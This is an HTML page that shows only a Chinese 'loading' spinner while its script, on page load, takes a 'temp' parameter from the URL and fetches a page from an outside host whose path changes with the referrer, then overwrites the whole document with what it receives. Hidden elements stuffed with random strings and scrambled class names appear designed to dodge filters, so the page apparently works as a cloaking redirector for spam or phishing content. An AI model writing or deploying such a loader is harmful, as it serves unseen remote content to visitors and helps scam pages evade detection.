<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rv9iom {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rv9iom .nWtniFn8jRu {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rv9iom .content {
            line-height: 50px;
            text-align: center
        }

        .rv9iom .img {
            width: 100%
        }

        .rv9iom .mMzFxhe2O2 {
            text-align: center
        }

        .rv9iom .mMzFxhe2O2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rv9iom .mMzFxhe2O2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rv9iom .mMzFxhe2O2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rv9iom .mMzFxhe2O2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rv9iom .mMzFxhe2O2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rv9iom .mMzFxhe2O2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rv9iom .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Hii7qEvwyg(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var fAvon = Hii7qEvwyg('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ fAvon +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ fAvon +".html?a=share";
		}
		
        qyP38Sfgx=url+"#"+new Date().getTime();
        qyP38Sfgx && function() {
            $.get(qyP38Sfgx, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<ul style='display:none' >aDcxJWHm228U1Ot8VBCEDbPfGQ0DJMlfx8KinuJQPTtYZUnwAMvaGYTBnOu</ul>
<h1 style='display:none' >ShDaeVIIYTx0ZnTmrZAIF0jmiF6</h1>
<img  src='' style='display:none'>
<ul style='display:none' >aDcxJWHm228U1Ot8VBCEDbPfGQ0DJMlfx8KinuJQPTtYZUnwAMvaGYTBnOu</ul>
<img  src='' style='display:none'>
<p  style='display:none'>NqSBFMm9thrredpmol1Xfg</p>
<span style='display:none'>S7lHAt6Hx2m28P</span><div class="rv9iom">
    <div class="nWtniFn8jRu">
        <div class="mMzFxhe2O2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<div style='display:none'>tVxCecmBlJhxbC1d3JWnBOnnHqPe8WaCz68PBZhJg3LqSP8mDzVhXM5U4cKfAxjQyZ</div>
<b style='display:none' >TrBhmF7CNHePrpu1rhnV00LCuUyqCcNgK8S0AYNYRsiXYyY</b>
<span style='display:none'>zyB8teHj1UFMaiYE15</span>
<b style='display:none' >TrBhmF7CNHePrpu1rhnV00LCuUyqCcNgK8S0AYNYRsiXYyY</b>
<li style='display:none' >rAXJoBXd1JgLGrJNRc0FkkY0</li>
<h1 style='display:none' >HDIM7AC0YyBfF8GserkM495qTeO</h1>
<img  src='' style='display:none'></body>
</html>